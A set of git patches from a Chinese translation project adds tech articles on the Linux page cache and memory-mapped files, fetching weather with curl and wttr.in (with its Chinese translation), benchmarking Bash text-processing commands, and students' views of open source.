+[9]:http://lxr.linux.no/linux+v2.6.28.1/include/linux/mm_types.h#L150
+[10]:http://lxr.linux.no/linux+v2.6.28.1/include/linux/mm_types.h#L174
+[11]:http://en.wikipedia.org/wiki/Red_black_tree
+[12]:http://lxr.linux.no/linux+v2.6.28.1/include/linux/mm_types.h#L175
+[13]:http://lxr.linux.no/linux+v2.6.28.1/fs/proc/task_mmu.c#L201
+[14]:http://www.nirsoft.net/kernel_struct/vista/EPROCESS.html
+[15]:http://www.nirsoft.net/kernel_struct/vista/MMVAD.html
+[16]:http://en.wikipedia.org/wiki/AVL_tree
+[17]:http://lxr.linux.no/linux+v2.6.28.1/include/linux/mm_types.h#L185
+[18]:http://lxr.linux.no/linux+v2.6.28.1/arch/x86/include/asm/pgtable.h#L173
+[19]:http://lxr.linux.no/linux+v2.6.28.1/arch/x86/include/asm/pgtable.h#L230
+[20]:http://www.google.com/search?hl=en&amp;amp;amp;q=2^20+*+2^12+bytes+in+GB
+[21]:http://en.wikipedia.org/wiki/Return-to-libc_attack
+[22]:http://duartes.org/gustavo/blog/post/getting-physical-with-memory
+[23]:http://lxr.linux.no/linux+v2.6.28/include/linux/mm_types.h#L32
+[24]:http://lxr.linux.no/linux+v2.6.28/include/linux/page-flags.h#L14
+[25]:http://en.wikipedia.org/wiki/Buddy_memory_allocation
+[26]:http://www.kernel.org/doc/man-pages/online/pages/man2/brk.2.html
+[27]:http://lxr.linux.no/linux+v2.6.28.1/mm/mmap.c#L2050
+[28]:http://lxr.linux.no/linux+v2.6.28/arch/x86/mm/fault.c#L583
+[29]:http://lxr.linux.no/linux+v2.6.28/arch/x86/mm/fault.c#L692
+[30]:http://lxr.linux.no/linux+v2.6.28/mm/mmap.c#L1466
+[31]:http://lxr.linux.no/linux+v2.6.28/arch/x86/mm/fault.c#L711
+[32]:http://lxr.linux.no/linux+v2.6.28/mm/memory.c#L2653
+[33]:http://lxr.linux.no/linux+v2.6.28/mm/memory.c#L2674
+[34]:http://lxr.linux.no/linux+v2.6.28/mm/memory.c#L2681
+[35]:http://lxr.linux.no/linux+v2.6.28/mm/memory.c#L2280
+[36]:http://lxr.linux.no/linux+v2.6.28/mm/memory.c#L2316
From ceed2592d3e63a1f04b82f3656a52603e2f63f63 Mon Sep 17 00:00:00 2001
From: qhwdw
Date: Fri, 12 Jan 2018 15:28:20 +0800
Subject: [PATCH 265/371] Translating by qhwdw
---
...che the Affair Between Memory and Files.md | 76 +++++++++++++++++++
1 file changed, 76 insertions(+)
create mode 100644 sources/tech/20090211 Page Cache the Affair Between Memory and Files.md
diff --git a/sources/tech/20090211 Page Cache the Affair Between Memory and Files.md b/sources/tech/20090211 Page Cache the Affair Between Memory and Files.md
new file mode 100644
index 0000000000..98c546eb2a
--- /dev/null
+++ b/sources/tech/20090211 Page Cache the Affair Between Memory and Files.md
@@ -0,0 +1,76 @@
+Translating by qhwdw [20090211 Page Cache, the Affair Between Memory and Files][1]
+============================================================
+
+
+Previously we looked at how the kernel [manages virtual memory][2] for a user process, but files and I/O were left out. This post covers the important and often misunderstood relationship between files and memory and its consequences for performance.
+
+Two serious problems must be solved by the OS when it comes to files. The first one is the mind-blowing slowness of hard drives, and [disk seeks in particular][3], relative to memory. The second is the need to load file contents in physical memory once and share the contents among programs. If you use [Process Explorer][4] to poke at Windows processes, you'll see there are ~15MB worth of common DLLs loaded in every process. My Windows box right now is running 100 processes, so without sharing I'd be using up to ~1.5 GB of physical RAM just for common DLLs. No good. Likewise, nearly all Linux programs need [ld.so][5] and libc, plus other common libraries.
+
+Happily, both problems can be dealt with in one shot: the page cache, where the kernel stores page-sized chunks of files. To illustrate the page cache, I'll conjure a Linux program named render, which opens file scene.dat and reads it 512 bytes at a time, storing the file contents into a heap-allocated block. The first read goes like this:
+
+![Reading and the page cache](http://static.duartes.org/img/blogPosts/readFromPageCache.png)
+
+After 12KB have been read, render's heap and the relevant page frames look thus:
+
+![Non-mapped file read](http://static.duartes.org/img/blogPosts/nonMappedFileRead.png)
+
+This looks innocent enough, but there's a lot going on. First, even though this program uses regular read calls, three 4KB page frames are now in the page cache storing part of scene.dat. People are sometimes surprised by this, but all regular file I/O happens through the page cache. In x86 Linux, the kernel thinks of a file as a sequence of 4KB chunks. If you read a single byte from a file, the whole 4KB chunk containing the byte you asked for is read from disk and placed into the page cache. This makes sense because sustained disk throughput is pretty good and programs normally read more than just a few bytes from a file region. The page cache knows the position of each 4KB chunk within the file, depicted above as #0, #1, etc. Windows uses 256KB views analogous to pages in the Linux page cache.
+
+Sadly, in a regular file read the kernel must copy the contents of the page cache into a user buffer, which not only takes cpu time and hurts the [cpu caches][6], but also wastes physical memory with duplicate data. As per the diagram above, the scene.dat contents are stored twice, and each instance of the program would store the contents an additional time. We've mitigated the disk latency problem but failed miserably at everything else. Memory-mapped files are the way out of this madness:
+
+![Mapped file read](http://static.duartes.org/img/blogPosts/mappedFileRead.png)
+
+When you use file mapping, the kernel maps your program's virtual pages directly onto the page cache. This can deliver a significant performance boost: [Windows System Programming][7] reports run time improvements of 30% and up relative to regular file reads, while similar figures are reported for Linux and Solaris in [Advanced Programming in the Unix Environment][8]. You might also save large amounts of physical memory, depending on the nature of your application.
+
+As always with performance, [measurement is everything][9], but memory mapping earns its keep in a programmer's toolbox. The API is pretty nice too, it allows you to access a file as bytes in memory and does not require your soul and code readability in exchange for its benefits. Mind your [address space][10] and experiment with [mmap][11] in Unix-like systems, [CreateFileMapping][12] in Windows, or the many wrappers available in high level languages. When you map a file its contents are not brought into memory all at once, but rather on demand via [page faults][13]. The fault handler [maps your virtual pages][14] onto the page cache after [obtaining][15] a page frame with the needed file contents. This involves disk I/O if the contents weren't cached to begin with.
+
+Now for a pop quiz. Imagine that the last instance of our render program exits. Would the pages storing scene.dat in the page cache be freed immediately? People often think so, but that would be a bad idea. When you think about it, it is very common for us to create a file in one program, exit, then use the file in a second program. The page cache must handle that case. When you think more about it, why should the kernel ever get rid of page cache contents? Remember that disk is 5 orders of magnitude slower than RAM, hence a page cache hit is a huge win. So long as there's enough free physical memory, the cache should be kept full. It is therefore not dependent on a particular process, but rather it's a system-wide resource. If you run render a week from now and scene.dat is still cached, bonus! This is why the kernel cache size climbs steadily until it hits a ceiling. It's not because the OS is garbage and hogs your RAM, it's actually good behavior because in a way free physical memory is a waste. Better use as much of the stuff for caching as possible.
+
+Due to the page cache architecture, when a program calls [write()][16] bytes are simply copied to the page cache and the page is marked dirty. Disk I/O normally does not happen immediately, thus your program doesn't block waiting for the disk. On the downside, if the computer crashes your writes will never make it, hence critical files like database transaction logs must be [fsync()][17]ed (though one must still worry about drive controller caches, oy!). Reads, on the other hand, normally block your program until the data is available. Kernels employ eager loading to mitigate this problem, an example of which is read ahead where the kernel preloads a few pages into the page cache in anticipation of your reads. You can help the kernel tune its eager loading behavior by providing hints on whether you plan to read a file sequentially or randomly (see [madvise()][18], [readahead()][19], [Windows cache hints][20] ). Linux [does read-ahead][21] for memory-mapped files, but I'm not sure about Windows. Finally, it's possible to bypass the page cache using [O_DIRECT][22] in Linux or [NO_BUFFERING][23] in Windows, something database software often does.
+
+A file mapping may be private or shared. This refers only to updates made to the contents in memory: in a private mapping the updates are not committed to disk or made visible to other processes, whereas in a shared mapping they are. Kernels use the copy on write mechanism, enabled by page table entries, to implement private mappings. In the example below, both render and another program called render3d (am I creative or what?) have mapped scene.dat privately. Render then writes to its virtual memory area that maps the file:
+
+![The Copy-On-Write mechanism](http://static.duartes.org/img/blogPosts/copyOnWrite.png)
+
+The read-only page table entries shown above do not mean the mapping is read only, they're merely a kernel trick to share physical memory until the last possible moment. You can see how 'private' is a bit of a misnomer until you remember it only applies to updates. A consequence of this design is that a virtual page that maps a file privately sees changes done to the file by other programs as long as the page has only been read from. Once copy-on-write is done, changes by others are no longer seen. This behavior is not guaranteed by the kernel, but it's what you get in x86 and makes sense from an API perspective. By contrast, a shared mapping is simply mapped onto the page cache and that's it. Updates are visible to other processes and end up in the disk. Finally, if the mapping above were read-only, page faults would trigger a segmentation fault instead of copy on write.
+
+Dynamically loaded libraries are brought into your program's address space via file mapping. There's nothing magical about it, it's the same private file mapping available to you via regular APIs. Below is an example showing part of the address spaces from two running instances of the file-mapping render program, along with physical memory, to tie together many of the concepts we've seen.
+
+![Mapping virtual memory to physical memory](http://static.duartes.org/img/blogPosts/virtualToPhysicalMapping.png)
+
+This concludes our 3-part series on memory fundamentals. I hope the series was useful and provided you with a good mental model of these OS topics.
+
+--------------------------------------------------------------------------------
+
+via:https://manybutfinite.com/post/page-cache-the-affair-between-memory-and-files/
+
+作者:[Gustavo Duarte][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:http://duartes.org/gustavo/blog/about/
+[1]:https://manybutfinite.com/post/page-cache-the-affair-between-memory-and-files/
+[2]:https://manybutfinite.com/post/how-the-kernel-manages-your-memory
+[3]:https://manybutfinite.com/post/what-your-computer-does-while-you-wait
+[4]:http://technet.microsoft.com/en-us/sysinternals/bb896653.aspx
+[5]:http://ld.so
+[6]:https://manybutfinite.com/post/intel-cpu-caches
+[7]:http://www.amazon.com/Windows-Programming-Addison-Wesley-Microsoft-Technology/dp/0321256190/
+[8]:http://www.amazon.com/Programming-Environment-Addison-Wesley-Professional-Computing/dp/0321525949/
+[9]:https://manybutfinite.com/post/performance-is-a-science
+[10]:https://manybutfinite.com/post/anatomy-of-a-program-in-memory
+[11]:http://www.kernel.org/doc/man-pages/online/pages/man2/mmap.2.html
+[12]:http://msdn.microsoft.com/en-us/library/aa366537(VS.85).aspx
+[13]:http://lxr.linux.no/linux+v2.6.28/mm/memory.c#L2678
+[14]:http://lxr.linux.no/linux+v2.6.28/mm/memory.c#L2436
+[15]:http://lxr.linux.no/linux+v2.6.28/mm/filemap.c#L1424
+[16]:http://www.kernel.org/doc/man-pages/online/pages/man2/write.2.html
+[17]:http://www.kernel.org/doc/man-pages/online/pages/man2/fsync.2.html
+[18]:http://www.kernel.org/doc/man-pages/online/pages/man2/madvise.2.html
+[19]:http://www.kernel.org/doc/man-pages/online/pages/man2/readahead.2.html
+[20]:http://msdn.microsoft.com/en-us/library/aa363858(VS.85).aspx#caching_behavior
+[21]:http://lxr.linux.no/linux+v2.6.28/mm/filemap.c#L1424
+[22]:http://www.kernel.org/doc/man-pages/online/pages/man2/open.2.html
+[23]:http://msdn.microsoft.com/en-us/library/cc644950(VS.85).aspx
\ No newline at end of file
From b3f0125ff06503e773951934b043c6e010e4276c Mon Sep 17 00:00:00 2001
From: darksun
Date: Fri, 12 Jan 2018 21:21:04 +0800
Subject: [PATCH 266/371] translate done: 20171013 Get Your Weather Forecast
From the Linux CLI.md
---
...our Weather Forecast From the Linux CLI.md | 140 ------------------
...our Weather Forecast From the Linux CLI.md | 113 ++++++++++++++
2 files changed, 113 insertions(+), 140 deletions(-)
delete mode 100644 sources/tech/20171013 Get Your Weather Forecast From the Linux CLI.md
create mode 100644 translated/tech/20171013 Get Your Weather Forecast From the Linux CLI.md
diff --git a/sources/tech/20171013 Get Your Weather Forecast From the Linux CLI.md b/sources/tech/20171013 Get Your Weather Forecast From the Linux CLI.md
deleted file mode 100644
index 07547654cf..0000000000
--- a/sources/tech/20171013 Get Your Weather Forecast From the Linux CLI.md
+++ /dev/null
@@ -1,140 +0,0 @@
-translating by lujun9972
-Get Your Weather Forecast From the Linux CLI
-======
-
-### Objective
-
-Display the current weather forecast in the Linux command line.
-
-### Distributions
-
-This will work on any Linux distribution.
-
-### Requirements
-
-A working Linux install with an Internet connection.
-
-### Difficulty
-
-Easy
-
-### Conventions
-
- * **#** \- requires given command to be executed with root privileges either directly as a root user or by use of `sudo` command
- * **$** \- given command to be executed as a regular non-privileged user
-
-
-
-### Introduction
-
-It's be convenient to be able to retrieve the latest weather forecast right from your terminal without opening up a web browser, wouldn't it? What about scripting it or setting a cron job? Well, you can.
-
-`http://wttr.in` is a website that allows you to search for weather forecasts anywhere in the world, and it displays he results in ASCII characters. By using `cURL`, you can access `http://wttr.in`, you can get your results directly in the terminal.
-
-### Get Your Local Weather
-
-
-
-![Local weather from wttr.in][1]
-It's really simple to grab your local weather. `wttr.in` will automatically try to detect your location based on your IP address. It's reasonably accurate, unless you're using a VPN, of course.
-```
-
-$ curl wttr.in
-
-```
-
-### Get Weather By City
-
-
-
-![Weather by city from wttr.in][2]
-Now, if you would like the weather in a different city, you can specify that with a slash at the end of `wttr.in`. Replace any spaces in the name with a `+`.
-```
-
-$ curl wttr.in/New+York
-
-```
-
-You can also specify cities the way they're written in Unix timezones.
-```
-
-$ curl wttr.in/New_York
-
-```
-
-Don't use spaces unless you like strange and inaccurate results.
-
-### Get Weather By Airport
-
-
-
-![Weather by airport from wttr.in][3]
-If you're familiar with the three letter airport codes in your area, you can use those too. They might be closer to you and more accurate than the city in general.
-```
-
-$ curl wttr.in/JFK
-
-```
-
-### Best Guess
-
-
-
-![Weather by landmark from wttr.in][4]
-You can have `wttr.in` take a guess on the weather base on a landmark using the `~` character.
-```
-
-$ curl wttr.in/~Statue+Of+Liberty
-
-```
-
-### Weather From A Domain Name
-
-
-
-![Weather by domain name from wttr.in][5]
-Did you ever wonder what the weather is like where LinuxConfig is hosted? Now, now you can find out! `wttr.in` can check weather by domain name. Sure, it's probably not the most useful feature, but it's still interesting none the less.
-```
-
-$ curl wttr.in/@linuxconfig.org
-
-```
-
-### Changing The Temperature Units
-
-
-
-![Change unit system in wttr.in][6]
-By default, `wttr.in` will display temperatures in the units(C or F) used in your actual location. Basically, in States, you'll get Fahrenheit, and everyone else will see Celsius. You can change that by adding `?u` to see Fahrenheit or `?m` to see Celsius.
-```
-
-$ curl wttr.in/New_York?m
-
-$ curl wttr.in/Toronto?u
-
-```
-
-There's an odd bug with ZSH that prevents this from working, so you need to use Bash if you want to convert the units.
-
-### Closing Thoughts
-
-You can easily incorporate a call to `wttr.in` into a script, cron job, or even your MOTD. Of course, you don't need to get that involved. You can just lazily type a call in to this awesome service whenever you want to check the forecast.
-
-
---------------------------------------------------------------------------------
-
-via: https://linuxconfig.org/get-your-weather-forecast-from-the-linux-cli
-
-作者:[Nick Congleton][a]
-译者:[lujun9972](https://github.com/lujun9972)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:https://linuxconfig.org
-[1]:https://linuxconfig.org/images/wttr-local.jpg
-[2]:https://linuxconfig.org/images/wttr-city.jpg
-[3]:https://linuxconfig.org/images/wttr-airport.jpg
-[4]:https://linuxconfig.org/images/wttr-landmark.jpg
-[5]:https://linuxconfig.org/images/wttr-url.jpg
-[6]:https://linuxconfig.org/images/wttr-units.jpg
diff --git a/translated/tech/20171013 Get Your Weather Forecast From the Linux CLI.md b/translated/tech/20171013 Get Your Weather Forecast From the Linux CLI.md
new file mode 100644
index 0000000000..952d87b25a
--- /dev/null
+++ b/translated/tech/20171013 Get Your Weather Forecast From the Linux CLI.md
@@ -0,0 +1,113 @@
+在 Linux 字符界面中获取天气预报
+======
+
+**目标:**使用 Linux 命令行显示天气预报。
+
+**发行版:**所有 Linux 发行版。
+
+**要求:**能连上因特网的 Linux
+
+**难度:**容易
+
+**约定:**
+
+* `#` - 需要使用 root 权限来执行指定命令,可以直接使用 root 用户来执行也可以使用 `sudo` 命令
+* `$` - 可以使用普通用户来执行指定命令
+
+### 简介
+
+无需打开网页浏览器就能直接从终端获取最新的天气预报那该多方便啊,对吧?你还能把它写成脚本,或者设置定义定时任务。
+
+`http://wttr.in` 是一个允许你搜索世界各地天气预报的网站,而且它的是以 ASCII 字符的形式来显示结果的。通过使用 `cURL` 访问 `http://wttr.in`,就能直接在终端显示查询结果了。
+
+### 获取所在地的天气
+
+![Local weather from wttr.in][1]
+
+要抓取所在地的天气情况非常简单。`wttr.in` 会自动根据 IP 地址来探测你的所在地。除非你用了 VPN,否则它的精度还不错。
+```
+$ curl wttr.in
+```
+
+### 获取指定城市的天气
+
+![Weather by city from wttr.in][2]
+
+你可以通过在 `wttr.in` 后加上斜杠和城市名称的方式来获得其他城市的天气情况。不过要把名字中的空格替换成`+`。
+```
+$ curl wttr.in/New+York
+```
+
+你也可以以 Unix 时区的形式来填写城市名称。
+```
+$ curl wttr.in/New_York
+```
+
+不要直接使用空格,否则会出现奇怪而不准确的结果。
+
+### 获取机场天气
+
+
+
+![Weather by airport from wttr.in][3]
+
+若你对地区的三位机场代号很熟悉,你也可以使用机场代号来查询天气。一般来说使用机场要比使用城市更贴近你,而且更精确一些。
+```
+$ curl wttr.in/JFK
+```
+
+### 猜测所在地
+
+![Weather by landmark from wttr.in][4]
+
+通过使用 `~` 字符,你可以让 `wttr.in` 通过地标来猜测天气情况。
+```
+$ curl wttr.in/~Statue+Of+Liberty
+```
+
+### 域名所在地的天气
+
+![Weather by domain name from wttr.in][5]
+
+你想不想知道 LinuxConfig 托管地的天气?现在有一个方法可以知道!`wttr.in` 可以通过域名获取天气。是的,这个功能可能不那么实用,但这很有趣啊。
+```
+
+$ curl wttr.in/@linuxconfig.org
+
+```
+
+### 更改温度单位
+
+![Change unit system in wttr.in][6]
+
+默认情况下,`wttr.in` 会根据你的实际地址来决定显示哪种温度单位 (C 还是 F)。基本上,在美国,使用的是华氏度,而其他地方显示的是摄氏度。你可以指定显示的温度单位,在 URL 后添加 `?u` 会显示华氏度,而添加 `?m` 会显示摄氏度。
+```
+$ curl wttr.in/New_York?m
+
+$ curl wttr.in/Toronto?u
+```
+
+在 ZSH 上有一个很奇怪的 bug,会使得这两条语句不能正常工厂,如果你需要更换单位,恐怕需要改成使用 Bash 了。
+
+### 总结
+
+你可以很方便地在脚本,定时任务,甚至 MOTD(LCTT 注:Message Of The Day 每日消息)中访问 `wttr.in`。当然,你完全没有必要这么做。当你需要查看天气预报的时候只需要访问一下这个超棒的网站就行了。
+
+
+--------------------------------------------------------------------------------
+
+via: https://linuxconfig.org/get-your-weather-forecast-from-the-linux-cli
+
+作者:[Nick Congleton][a]
+译者:[lujun9972](https://github.com/lujun9972)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://linuxconfig.org
+[1]:https://linuxconfig.org/images/wttr-local.jpg
+[2]:https://linuxconfig.org/images/wttr-city.jpg
+[3]:https://linuxconfig.org/images/wttr-airport.jpg
+[4]:https://linuxconfig.org/images/wttr-landmark.jpg
+[5]:https://linuxconfig.org/images/wttr-url.jpg
+[6]:https://linuxconfig.org/images/wttr-units.jpg
From b23ac72932145a076c71cb1341fb8c857a085df2 Mon Sep 17 00:00:00 2001
From: darksun
Date: Fri, 12 Jan 2018 21:26:32 +0800
Subject: [PATCH 267/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20BASH=20drivers,?=
=?UTF-8?q?=20start=20your=20engines?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...180111 BASH drivers, start your engines.md | 90 +++++++++++++++++++
1 file changed, 90 insertions(+)
create mode 100644 sources/tech/20180111 BASH drivers, start your engines.md
diff --git a/sources/tech/20180111 BASH drivers, start your engines.md b/sources/tech/20180111 BASH drivers, start your engines.md
new file mode 100644
index 0000000000..7126bea3e0
--- /dev/null
+++ b/sources/tech/20180111 BASH drivers, start your engines.md
@@ -0,0 +1,90 @@
+BASH drivers, start your engines
+======
+
+![](http://www.thelinuxrain.com/content/01-articles/201-bash-drivers-start-your-engines/headimage.jpg)
+
+There's always more than one way to do a job in the shell, and there may not be One Best Way to do that job, either.
+
+Nevertheless, different commands with the same output can differ in how long they take, how much memory they use and how hard they make the CPU work.
+
+Out of curiosity I trialled 6 different ways to get the last 5 characters from each line of a text file, which is a simple text-processing task. The 6 commands are explained below and are abbreviated here as awk5, echo5, grep5, rev5, sed5 and tail5. These were also the names of the files generated by the commands.
+
+### Tracking performance
+
+I ran the trial on a 1.6GB UTF-8 text file with 1559391514 characters on 3570866 lines, or an average of 437 characters per line, and no blank lines. The last 5 characters on every line were alphanumeric.
+
+To time the 6 commands I used **time** (the BASH shell built-in, not GNU **time** ) and while the commands were running I checked **top** to follow memory and CPU usage. My system is the Dell OptiPlex 9020 Micro described [here][1] and runs Debian 9.
+
+All 6 commands used between 1 and 1.4GB of memory (VIRT in **top** ), and awk5, echo5, grep5 and sed5 ran at close to 100% CPU usage. Interestingly,
+rev5 ran at ca 30% CPU and tail5 at ca 15%.
+
+To ensure that all 6 commands had done the same job, I did a **diff** on the 6 output files, each about 21 MB:
+
+![][2]
+
+### And the winner is...
+
+Here are the elapsed times:
+
+![][3]
+
+Well, AWK (GNU AWK 4.1.4) is really fast. Sure, all 6 commands could process a 100-line file zippety-quick, but for big text-processing jobs, fire up your AWK.
+
+### Commands used
+```
+awk '{print substr($0,length($0)-4,5)}' file > awk5
+```
+
+awk5 used AWK's substring function. The function works on the whole line ($0), starts at the 4th character back from the last character (length($0)-4) and returns 5 characters (5).
+```
+#!/bin/bash
+while read line; do echo "${line: -5}"; done < file > echo5
+exit
+```
+
+echo5 was run as a script and uses a **while** loop for processing one line at a time. The BASH string function "${line: -5}" returns the last 5 characters in "$line".
+```
+grep -o '.....$' file > grep5
+```
+
+In grep5, **grep** searches each line for the last 5 characters (.....$) and returns (with the -o option) just that searched-for string.
+```
+#!/bin/bash
+while read line; do rev <<<"$line" | cut -c1-5 | rev; done < file > rev5
+exit
+```
+
+The rev5 trick in this script has appeared often in online forums. Each line is first reversed with **rev** , then **cut** is used to return the first 5 characters, then the 5-character string is reversed with **rev**.
+```
+sed 's/.*\(.....\)/\1/' file > sed5
+```
+
+sed5 is a simple use of **sed** (GNU sed 4.4) but was surprisingly slow in the trial. In each line, **sed** replaces zero or more characters leading up to the last 5 with just those last 5 (as a backreference).
+```
+#!/bin/bash
+while read line; do tail -c 6 <<<"$line"; done < file > tail5
+exit
+```
+
+The "-c 6" in the tail5 script means that **tail** captures the last 5 characters in each line plus the newline character at the end.
+
+Actually, the "-c" option captures bytes, not characters, meaning if the line ends in multi-byte characters the output will be corrupt. But would you really want to use the ultra-slow **tail** for this job in the first place?
+
+### About the Author
+
+Bob Mesibov is Tasmanian, retired and a keen Linux tinkerer.
+
+--------------------------------------------------------------------------------
+
+via: http://www.thelinuxrain.com/articles/bash-drivers-start-your-engines
+
+作者:[Bob Mesibov][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:http://www.thelinuxrain.com
+[1]:http://www.thelinuxrain.com/articles/debian-9-on-a-dell-optiplex-9020-micro
+[2]:http://www.thelinuxrain.com/content/01-articles/201-bash-drivers-start-your-engines/1.png
+[3]:http://www.thelinuxrain.com/content/01-articles/201-bash-drivers-start-your-engines/2.png
From 6c9bd05543da567670467bf2e1248b4ce1da7e32 Mon Sep 17 00:00:00 2001
From: darksun
Date: Fri, 12 Jan 2018 21:37:01 +0800
Subject: [PATCH 268/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Why=20isn't=20ope?=
=?UTF-8?q?n=20source=20hot=20among=20computer=20science=20students=3F?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...rce hot among computer science students.md | 84 +++++++++++++++++++
1 file changed, 84 insertions(+)
create mode 100644 sources/tech/20190110 Why isn-t open source hot among computer science students.md
diff --git a/sources/tech/20190110 Why isn-t open source hot among computer science students.md b/sources/tech/20190110 Why isn-t open source hot among computer science students.md
new file mode 100644
index 0000000000..282d723949
--- /dev/null
+++ b/sources/tech/20190110 Why isn-t open source hot among computer science students.md
@@ -0,0 +1,84 @@
+Why isn't open source hot among computer science students?
+======
+
+![](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/EDU_OSDC_OpenClass_520x292_FINAL_JD.png?itok=ly78pMqu)
+
+Image by : opensource.com
+
+The technical savvy and inventive energy of young programmers is alive and well.
+
+This was clear from the diligent work that I witnessed while participating in this year's [PennApps][1], the nation's largest college hackathon. Over the course of 48 hours, my high school- and college-age peers created projects ranging from a [blink-based communication device for shut-in patients][2] to a [burrito maker with IoT connectivity][3]. The spirit of open source was tangible throughout the event, as diverse groups bonded over a mutual desire to build, the free flow of ideas and tech know-how, fearless experimentation and rapid prototyping, and an overwhelming eagerness to participate.
+
+Why then, I wondered, wasn't open source a hot topic among my tech geek peers?
+
+To learn more about what college students think when they hear "open source," I surveyed several college students who are members of the same professional computer science organization I belong to. All members of this community must apply during high school or college and are selected based on their computer science-specific achievements and leadership--whether that means leading a school robotics team, founding a nonprofit to bring coding into insufficiently funded classrooms, or some other worthy endeavor. Given these individuals' accomplishments in computer science, I thought that their perspectives would help in understanding what young programmers find appealing (or unappealing) about open source projects.
+
+The online survey I prepared and disseminated included the following questions:
+
+ * Do you like to code personal projects? Have you ever contributed to an open source project?
+ * Do you feel like it's more beneficial to you to start your own programming projects, or to contribute to existing open source efforts?
+ * How would you compare the prestige associated with coding for an organization that produces open source software versus proprietary software?
+
+
+
+Though the overwhelming majority said that they at least occasionally enjoyed coding personal projects in their spare time, most had never contributed to an open source project. When I further explored this trend, a few common preconceptions about open source projects and organizations came to light. To persuade my peers that open source projects are worth their time, and to provide educators and open source organizations insight on their students, I'll address the three top preconceptions.
+
+### Preconception #1: Creating personal projects from scratch is better experience than contributing to an existing open source project.
+
+Of the college-age programmers I surveyed, 24 out of 26 asserted that starting their own personal projects felt potentially more beneficial than building on open source ones.
+
+As a bright-eyed freshman in computer science, I believed this too. I had often heard from older peers that personal projects would make me more appealing to intern recruiters. No one ever mentioned the possibility of contributing to open source projects--so in my mind, it wasn't relevant.
+
+I now realize that open source projects offer powerful preparation for the real world. Contributing to open source projects cultivates [an awareness of how tools and languages piece together][4] in a way that even individual projects cannot. Moreover, open source is an exercise in coordination and collaboration, building students' [professional skills in communication, teamwork, and problem-solving. ][5]
+
+### Preconception #2: My coding skills just won't cut it.
+
+A few respondents said they were intimidated by open source projects, unsure of where to contribute, or fearful of stunting project progress. Unfortunately, feelings of inferiority, which too often especially affect female programmers, do not stop at the open source community. In fact, "Imposter Syndrome" may even be magnified, as [open source advocates typically reject bureaucracy][6]--and as difficult as bureaucracy makes internal mobility, it helps newcomers know their place in an organization.
+
+I remember how intimidated I felt by contribution guidelines while looking through open source projects on GitHub for the first time. However, guidelines are not intended to encourage exclusivity, but to provide a [guiding hand][7]. To that end, I think of guidelines as a way of establishing expectations without relying on a hierarchical structure.
+
+Several open source projects actively carve a place for new project contributors. [TEAMMATES][8], an educational feedback management tool, is one of the many open source projects that marks issues "up for grabs" for first-timers. In the comments, programmers of all skill levels iron out implementation details, demonstrating that open source is a place for eager new programmers and seasoned software veterans alike. For young programmers who are still hesitant, [a few open source projects][9] have been thoughtful enough to adopt an [Imposter Syndrome disclaimer][10].
+
+### Preconception #3: Proprietary software firms do better work than open source software organizations.
+
+Only five of the 26 respondents I surveyed thought that open and proprietary software organizations were considered equal in prestige. This is likely due to the misperception that "open" means "profitless," and thus low-quality (see [Doesn't 'open source' just mean something is free of charge?][11]).
+
+However, open source software and profitable software are not mutually exclusive. In fact, small and large businesses alike often pay for free open source software to receive technical support services. As [Red Hat CEO Jim Whitehurst explains][12], "We have engineering teams that track every single change--a bug fix, security enhancement, or whatever--made to Linux, and ensure our customers' mission-critical systems remain up-to-date and stable."
+
+Moreover, the nature of openness facilitates rather than hinders quality by enabling more people to examine source code. [Igor Faletski, CEO of Mobify][13], writes that Mobify's team of "25 software developers and quality assurance professionals" is "no match for the all the software developers in the world who might make use of [Mobify's open source] platform. Each of them is a potential tester of, or contributor to, the project."
+
+Another problem may be that young programmers are not aware of the open source software they interact with every day. I used many tools--including MySQL, Eclipse, Atom, Audacity, and WordPress--for months or even years without realizing they were open source. College students, who often rush to download syllabus-specified software to complete class assignments, may be unaware of which software is open source. This makes open source seem more foreign than it is.
+
+So students, don't knock open source before you try it. Check out this [list of beginner-friendly projects][14] and [these six starting points][15] to begin your open source journey.
+
+Educators, remind your students of the open source community's history of successful innovation, and lead them toward open source projects outside the classroom. You will help develop sharper, better-prepared, and more confident students.
+
+### About the author
+Susie Choi - Susie is an undergraduate student studying computer science at Duke University. She is interested in the implications of technological innovation and open source principles for issues relating to education and socioeconomic inequality.
+
+--------------------------------------------------------------------------------
+
+via: https://opensource.com/article/17/12/students-and-open-source-3-common-preconceptions
+
+作者:[Susie Choi][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://opensource.com/users/susiechoi
+[1]:http://pennapps.com/
+[2]:https://devpost.com/software/blink-9o2iln
+[3]:https://devpost.com/software/daburrito
+[4]:https://hackernoon.com/benefits-of-contributing-to-open-source-2c97b6f529e9
+[5]:https://opensource.com/education/16/8/5-reasons-student-involvement-open-source
+[6]:https://opensource.com/open-organization/17/7/open-thinking-curb-bureaucracy
+[7]:https://opensource.com/life/16/3/contributor-guidelines-template-and-tips
+[8]:https://github.com/TEAMMATES/teammates/issues?q=is%3Aissue+is%3Aopen+label%3Ad.FirstTimers
+[9]:https://github.com/adriennefriend/imposter-syndrome-disclaimer/blob/master/examples.md
+[10]:https://github.com/adriennefriend/imposter-syndrome-disclaimer
